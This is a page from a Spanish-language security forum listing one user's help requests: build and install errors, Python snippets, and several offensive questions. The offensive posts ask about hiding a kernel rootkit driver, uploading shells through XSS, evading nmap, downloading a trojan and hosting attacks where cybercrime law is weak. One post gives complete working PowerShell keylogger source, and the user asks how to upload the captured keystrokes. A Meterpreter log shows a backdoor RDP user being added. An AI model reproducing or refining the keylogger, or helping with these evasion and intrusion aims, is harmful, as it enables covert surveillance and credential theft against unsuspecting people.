/usr/src/linux-headers-4.14.0-parrot2-common/scripts/Makefile.build:319: recipe for target '/tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.o' failed
make[4]: *** [/tmp/modconfig-0hEIO0/vmmon-only/linux/hostif.o] Error 1
make[4]: *** Waiting for unfinished jobs....
/usr/src/linux-headers-4.14.0-parrot2-common/Makefile:1520: recipe for target '_module_/tmp/modconfig-0hEIO0/vmmon-only' failed
make[3]: *** [_module_/tmp/modconfig-0hEIO0/vmmon-only] Error 2
Makefile:146: recipe for target 'sub-make' failed
make[2]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.14.0-parrot2-amd64'
Makefile:110: recipe for target 'vmmon.ko' failed
make: *** [vmmon.ko] Error 2
make: Leaving directory '/tmp/modconfig-0hEIO0/vmmon-only'
make: Entering directory '/tmp/modconfig-0hEIO0/vmnet-only'
Using kernel build system.
/usr/bin/make -C /lib/modules/4.14.0-parrot2-amd64/build/include/.. SUBDIRS=$PWD SRCROOT=$PWD/. \
  MODULEBUILDDIR= modules
make[1]: Entering directory '/usr/src/linux-headers-4.14.0-parrot2-amd64'
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/driver.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/hub.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/userif.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/netif.o
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci.h:37:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/compat_netdevice.h:27,
                 from /tmp/modconfig-0hEIO0/vmnet-only/netif.c:43:
/usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci_ids.h:2261:0: warning: "PCI_VENDOR_ID_VMWARE" redefined
 #define PCI_VENDOR_ID_VMWARE  0x15ad
 
In file included from /tmp/modconfig-0hEIO0/vmnet-only/net.h:38:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/vnetInt.h:26,
                 from /tmp/modconfig-0hEIO0/vmnet-only/netif.c:42:
/tmp/modconfig-0hEIO0/vmnet-only/vm_device_version.h:56:0: note: this is the location of the previous definition
 #define PCI_VENDOR_ID_VMWARE                    0x15AD
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci.h:37:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/compat_netdevice.h:27,
                 from /tmp/modconfig-0hEIO0/vmnet-only/netif.c:43:
/usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci_ids.h:2262:0: warning: "PCI_DEVICE_ID_VMWARE_VMXNET3" redefined
 #define PCI_DEVICE_ID_VMWARE_VMXNET3 0x07b0
 
In file included from /tmp/modconfig-0hEIO0/vmnet-only/net.h:38:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/vnetInt.h:26,
                 from /tmp/modconfig-0hEIO0/vmnet-only/netif.c:42:
/tmp/modconfig-0hEIO0/vmnet-only/vm_device_version.h:73:0: note: this is the location of the previous definition
 #define PCI_DEVICE_ID_VMWARE_VMXNET3            0x07B0
 
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/bridge.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/procfs.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/smac_compat.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/smac.o
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/vnetEvent.o
In file included from /tmp/modconfig-0hEIO0/vmnet-only/net.h:38:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/vnetInt.h:26,
                 from /tmp/modconfig-0hEIO0/vmnet-only/bridge.c:53:
/tmp/modconfig-0hEIO0/vmnet-only/vm_device_version.h:56:0: warning: "PCI_VENDOR_ID_VMWARE" redefined
 #define PCI_VENDOR_ID_VMWARE                    0x15AD
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci.h:37:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/compat_netdevice.h:27,
                 from /tmp/modconfig-0hEIO0/vmnet-only/bridge.c:52:
/usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci_ids.h:2261:0: note: this is the location of the previous definition
 #define PCI_VENDOR_ID_VMWARE  0x15ad
 
In file included from /tmp/modconfig-0hEIO0/vmnet-only/net.h:38:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/vnetInt.h:26,
                 from /tmp/modconfig-0hEIO0/vmnet-only/bridge.c:53:
/tmp/modconfig-0hEIO0/vmnet-only/vm_device_version.h:73:0: warning: "PCI_DEVICE_ID_VMWARE_VMXNET3" redefined
 #define PCI_DEVICE_ID_VMWARE_VMXNET3            0x07B0
 
In file included from /usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci.h:37:0,
                 from /tmp/modconfig-0hEIO0/vmnet-only/compat_netdevice.h:27,
                 from /tmp/modconfig-0hEIO0/vmnet-only/bridge.c:52:
/usr/src/linux-headers-4.14.0-parrot2-common/include/linux/pci_ids.h:2262:0: note: this is the location of the previous definition
 #define PCI_DEVICE_ID_VMWARE_VMXNET3 0x07b0
 
  CC [M]  /tmp/modconfig-0hEIO0/vmnet-only/vnetUserListener.o
  LD [M]  /tmp/modconfig-0hEIO0/vmnet-only/vmnet.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /tmp/modconfig-0hEIO0/vmnet-only/vmnet.mod.o
  LD [M]  /tmp/modconfig-0hEIO0/vmnet-only/vmnet.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.14.0-parrot2-amd64'
/usr/bin/make -C $PWD SRCROOT=$PWD/. \
  MODULEBUILDDIR= postbuild
make[1]: Entering directory '/tmp/modconfig-0hEIO0/vmnet-only'
make[1]: 'postbuild' is up to date.
make[1]: Leaving directory '/tmp/modconfig-0hEIO0/vmnet-only'
cp -f vmnet.ko ./../vmnet.o
make: Leaving directory '/tmp/modconfig-0hEIO0/vmnet-only'
Unable to install all modules.  See log for details.

tengo la bios sin el uefi y no se que hacer, ya he buscado la manera para solucionarlo pero no lo consigo, ayudaaa :'(

3
Dudas y pedidos generales / [SOLUCIONADO] Como comprar un servidor
« en: Diciembre 15, 2017, 05:00:48 pm »
Hola,me gustaria saber como puedo comprar un servidor en un pais sin legislatura en delitos informaticos, principalmente porque quiero hacer pruebas y no quiero ir a la carcel, y mi router no permite tener una ip publica, asi que la solucion mas asequible es a mi parecer es comprarlo en un pais sin legislatura. Que se pueda colgar servicios como nodejs¿Alguna idea? ::)

4
Dudas y pedidos generales / como puedo comprimir .sys en un .exe
« en: Octubre 19, 2017, 11:48:08 am »
hola,estoy aprendiendo ha hacer rootkits a nivel de kernel,y me preguntaba si habria alguna manera de comprimir un driver en un .exe para que no abulte ni cante tanto ::) ::)

gracias

5
Hola,me gustaria empezar en la informatica forense,ya que es un tema que me apasiona
pero desgraciadamente no se por donde empezar

cualquier ayuda o sugerencia sera agraciada

6
hola,quiero empezar en el analisis de malware,pero no se como empezar,me podeis ayudar por favor   ;) ;)

7
Python / Generador de palabras
« en: Julio 28, 2017, 10:56:58 am »
Hola,he hecho un script en python que genera las diferentes formas de una palabra,esto podria servir para generar diccionarios u otras cosas que se necesite muchas palabras xD
Código: Python
  1. import sys
  2. def get_max_num(word):
  3.         maxi = 1
  4.         for x in range(len(word)):
  5.                 maxi *= len(word)
  6.  
  7.         return maxi
  8.  
  9. dic = sys.argv[1]
  10. print "El numero de palabras que se generaran sera: "+str(get_max_num(dic))+"\nQuires proseguir?[Y/N]"
  11. resp = raw_input(">")
  12. if resp != "Y":
  13.         sys.exit(0)
  14.  
  15. lista = [0] * int(len(dic))
  16. palabra = ""
  17. a = 0
  18. while True:
  19.         palabra = ""
  20.         for w in range(len(lista)):
  21.                 if lista[w] == len(dic):
  22.                         lista[w] = 0
  23.                         try:
  24.                                 lista[w+1]+=1
  25.                         except:
  26.                                 pass
  27.         for x in lista:
  28.                 palabra += dic[x]
  29.  
  30.         lista[0]+=1
  31.  
  32.         print palabra
  33.         a+=1
  34.         if a == get_max_num(dic):
  35.                 break
y funciona asi:
Código: [Seleccionar]
$python script.py holada este resultado:
Código: [Seleccionar]
El numero de palabras que se generaran sera: 256
Quires proseguir?[Y/N]
>Y
hhhh
ohhh
lhhh
ahhh
hohh
oohh
lohh
aohh
hlhh
olhh
llhh
alhh
hahh
oahh
lahh
aahh
hhoh
ohoh
lhoh
ahoh
hooh
oooh
looh
aooh
hloh
oloh
lloh
aloh
haoh
oaoh
laoh
aaoh
hhlh
ohlh
lhlh
ahlh
holh
oolh
lolh
aolh
hllh
ollh
lllh
allh
halh
oalh
lalh
aalh
hhah
ohah
lhah
ahah
hoah
ooah
loah
aoah
hlah
olah
llah
alah
haah
oaah
laah
aaah
hhho
ohho
lhho
ahho
hoho
ooho
loho
aoho
hlho
olho
llho
alho
haho
oaho
laho
aaho
hhoo
ohoo
lhoo
ahoo
hooo
oooo
looo
aooo
hloo
oloo
lloo
aloo
haoo
oaoo
laoo
aaoo
hhlo
ohlo
lhlo
ahlo
holo
oolo
lolo
aolo
hllo
ollo
lllo
allo
halo
oalo
lalo
aalo
hhao
ohao
lhao
ahao
hoao
ooao
loao
aoao
hlao
olao
llao
alao
haao
oaao
laao
aaao
hhhl
ohhl
lhhl
ahhl
hohl
oohl
lohl
aohl
hlhl
olhl
llhl
alhl
hahl
oahl
lahl
aahl
hhol
ohol
lhol
ahol
hool
oool
lool
aool
hlol
olol
llol
alol
haol
oaol
laol
aaol
hhll
ohll
lhll
ahll
holl
ooll
loll
aoll
hlll
olll
llll
alll
hall
oall
lall
aall
hhal
ohal
lhal
ahal
hoal
ooal
loal
aoal
hlal
olal
llal
alal
haal
oaal
laal
aaal
hhha
ohha
lhha
ahha
hoha
ooha
loha
aoha
hlha
olha
llha
alha
haha
oaha
laha
aaha
hhoa
ohoa
lhoa
ahoa
hooa
oooa
looa
aooa
hloa
oloa
lloa
aloa
haoa
oaoa
laoa
aaoa
hhla
ohla
lhla
ahla
hola
oola
lola
aola
hlla
olla
llla
alla
hala
oala
lala
aala
hhaa
ohaa
lhaa
ahaa
hoaa
ooaa
loaa
aoaa
hlaa
olaa
llaa
alaa
haaa
oaaa
laaa
aaaa

8
Dudas y pedidos generales / Imposible instalar wine
« en: Julio 04, 2017, 08:16:56 am »
Hola,tengo un problema con mi KDE neon y es que no puedo instalar wine,demostracion
Código: [Seleccionar]
Leyendo lista de paquetes...
Creando árbol de dependencias...
Leyendo la información de estado...
No se pudieron instalar algunos paquetes. Esto puede significar que
usted pidió una situación imposible o, si está usando la distribución
inestable, que algunos paquetes necesarios aún no se han creado o se
han sacado de «Incoming».
La siguiente información puede ayudar a resolver la situación:

Los siguientes paquetes tienen dependencias incumplidas:
 build-essential : Depende: gcc (>= 4:5.2) pero no va a instalarse
                   Depende: g++ (>= 4:5.2) pero no va a instalarse
 wine : Depende: wine1.6 pero no va a instalarse

No se que hacer,ya he buscado en google y en foros pero no encuentro la solucion al problema,HELP ME!!!! :'( :'( :'( :'(

9
Dudas y pedidos generales / [SOLUCIONADO] Duda sobre vulnerabilidad
« en: Abril 29, 2017, 06:04:57 am »
Hola, el otro dia estaba buscando vulnerabilidades con nessus en el router de mi amigo(porque me lo pidio xD) y me encontre esto:
tenia un total de 4 low,6 medium,1 high y 1 critical

la critical es esta:


y la high es esta:



y no se como explotarlas para demostrale lo que se podria hacer con esas vulnerabilidades,ya he buscado por montones de sitios y no encuentro ningun exploit,ayuda!! :'(

10
Hola,como se podría subir archivos con javascript, para subir shells con un xss

11
Hola, como puedo hacer que no me puedan detectar por nmap?,osea que no puedan saber que estoy conectado a la red?

12
Hola, me preguntaba como podria separar un string cada 16 caracteres,me explico:
si tengo:
Código: Python
  1. sample = "12345678901234567"
que tiene 17 digitos,que me quede en:
Código: Python
  1. [''123456890123456","7"]
como podria hacerlo?

13
Dudas y pedidos generales / ¿Cómo cambiar un texto en Python?
« en: Marzo 20, 2017, 03:55:04 pm »
Hola,tenia esta duda y no sabria como hacerlo,sale en un episodio de mr robot,y es como puedo cambiar un texto sin tener que volverlo a printear,
que si tengo
Código: [Seleccionar]
            1 de 10000
que lo pueda cambiar a:
Código: [Seleccionar]
            2 de 10000

Sin tener que volver a printearlo.

14
Dudas y pedidos generales / Cómo esperar tiempo en powershell
« en: Marzo 14, 2017, 03:20:44 pm »
hola tenia una duda, la cual es que estoy haciendo un keylogger(en powershell) y no se como esperar tiempo para que lo suba por UploadString()
 os dejo el codigo del keylogger:
Código: [Seleccionar]
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
$null = New-Item -Path $Path -ItemType File -Force
try
{
while ($true) {
Start-Sleep -Milliseconds 40

for ($ascii = 9; $ascii -le 254; $ascii++) {

$state = $API::GetAsyncKeyState($ascii)

if ($state -eq -32767) {
$null = [console]::CapsLock

$virtualKey = $API::MapVirtualKey($ascii, 3)

$kbstate = New-Object Byte[] 256
$checkkbstate = $API::GetKeyboardState($kbstate)

$mychar = New-Object -TypeName System.Text.StringBuilder
$success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
if ($success)
{
[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
}
}
}
}
}
{
}
}
Start-KeyLogger

ayuda!! :'( :'(

15
hola,como puedo cambiar la politica de ejecucion de scripts en powershell con un script .bat ??

gracias por su atencion ;)

16
Hola, tenia una duda, la cual es que tengo xss en los comentarios de mi wordpress y no se como solucionarlo

17
Dudas y pedidos generales / [SOLUCIONADO] No bootea usb
« en: Enero 24, 2017, 02:25:51 pm »
Hola tengo un problema y es que al intentar bootear mi usb en mi pcno bootea,el usb contiene parrot os security (aunque tampoco funciona con kali linux)
El pc que tengo es un aspire es 15 y no tiene lector de DVD

18
Hola,el otro dia estaba usando wifi punpkin cuando me dijo qye necesitaba 2 tarjetas wifi,estuve buscando y encontre esta: Realtek RTL8187L
Esta es una tarjeta wifi?

19
Dudas y pedidos generales / [SOLUCIONADO] Descarga de: Troyano flu-proyect
« en: Diciembre 20, 2016, 06:45:33 pm »
Alguien sabe donde descargar el troyano de flu-project?

20
Dudas y pedidos generales / [SOLUCIONADO] Error getgui
« en: Diciembre 18, 2016, 11:22:58 am »
Hola,tengo este error en getgui cuando hago un getgui me pasa esto:
Código: [Seleccionar]
meterpreter > run getgui -u pwned -p lel -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[-] Unexpected windows error 1332
[-] Error in script: NoMethodError undefined method `[]' for nil:NilClass
Ayudaaa

Páginas: [1] 2 3